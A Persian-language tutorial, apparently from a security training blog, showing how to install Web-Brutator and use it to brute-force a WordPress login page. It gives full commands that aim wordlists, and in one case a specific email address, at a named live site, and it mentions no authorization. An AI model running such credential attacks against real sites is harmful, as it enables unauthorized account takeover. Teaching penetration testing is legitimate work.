کرک صفحه ی ورود با Web-Brutator - وان سرور آکـادمی

کرک صفحه ی ورود با Web-Brutator

Posted by علی محمدی 16/02/2021
زمان تقریبی مطالعه: 3 دقیقه

در این آموزش ما به بررسی یکی از ابزار های فوق العاده جالب بروت فورس صفحات لاگین یا همان ورود میپردازیم، که نام آن Web-Brutator است. ابزار Web-brutator به طور خودکار و اتوماتیک می تواند فرم های استاندارد احراز هویت و فرم های لاگین به وب را شناسایی کرده و bruteforce را به طور خودکار انجام دهد. این ویژگی از طریق فرم استاندارد ماژول در دسترس است ، و همچنین مبتنی بر چندین روش اکتشافی است.

خب نگاهی بیندازیم.

نصب موارد مورد نیاز

اول از همه ما باید، قبل از اقدام به نصب این ابزار، برخی از وابستگی ها را در سیستم kali linux خود نصب کنیم.

apt install python
apt install python3
apt install python-pip
apt install python3-pip

نصب ابزار

اکنون دستور git clone را اجرا می کنیم تا این ابزار را از gihtub بارگیری کنیم و سپس به داخل پوشه می رویم.

git clone https://github.com/koutto/web-brutator.git
cd web-brutator/
کرک صفحه ی ورود با Web-Brutator

همانطور که می دانیم هر ابزار به ابزار دیگری نیز نیاز دارد و به آن وابستگی دارد، بنابراین دستور زیر را برای نصب این ابزارها اجرا خواهیم کرد.

python3 -m pip install -r requirements.txt
کرک صفحه ی ورود با Web-Brutator

و تمام! همانطور که در تصویر زیر مشاهده می کنید ابزار ما با موفقیت راه اندازی شده است. با افزودن دستور “-h” می توانید تمام جزئیات مربوط به آن را بدست آورید.

python3 web-brutator.py -h
کرک صفحه ی ورود با Web-Brutator

اکنون می توانید لیست کلمات خود را و مورد مورد نیاز دیگر مربوط به کاربر را قرار دهید. پس از تنظیم تمام جزئیات مورد نیاز در دستور، آن را اجرا کنید.

  • –target : < از گزینه standardform برای شناسایی cms به خودی خود استفاده کنید >
  • –url : < محل دقیق صفحه ی لاگین در وبسایت هدف >
  • -U : < مسیر لیست کلمات نام کاربری >
  • -P : < مسیر لیست کلمات عبور >
  • -u : < نام کاربری >
  • -p : < پسورد >
python3 web-brutator.py --target standardform --url https://secnhack.in/wp-login.php -U user.txt -P pass.txt -s -t 40 -v
کرک صفحه ی ورود با Web-Brutator

و حالا ! همانطور که می بینید رمز عبور وب سایت موردنظر همراه با شناسایی خودکار CMS به راحتی انجام شده است.

کرک صفحه ی ورود با Web-Brutator

مشخص کردن نام کاربری

بنابراین ، اگر قبلاً نام کاربری یا آدرس ایمیل مورد نظر را می دانید ، می توانید آن را با استفاده از گزینه “-u” وارد کنید.

python3 web-brutator.py --target standardform --url https://secnhack.in/wp-login.php -u sg5479845@gmail.com -P pass.txt -s -t 40 -v
کرک صفحه ی ورود با Web-Brutator

عالی! نتایج دوباره بسیار چشمگیر است و می بینید که ما دوباره رمز ورود به وب سایت هدف را بدست آورده ایم.

کرک صفحه ی ورود با Web-Brutator

به همین ترتیب ، ویژگی های زیادی در داخل این ابزار وجود دارد که می توانید یکی یکی از آنها استفاده کنید و با به دست آوردن جزئیات ورود به سیستم ، از آنها استفاده کنید.

کرک صفحه ی ورود با Web-Brutator

جمع بندی

خب، ما این در این آموزش به یکی از مباحث امنیت و تست نفوذ پرداختیم، یعنی کرک صفحه ی ورود با Web-Brutator.

امیدواریم از این آموزش بهره کافی را برده باشید.

4.6/5 - (16 امتیاز)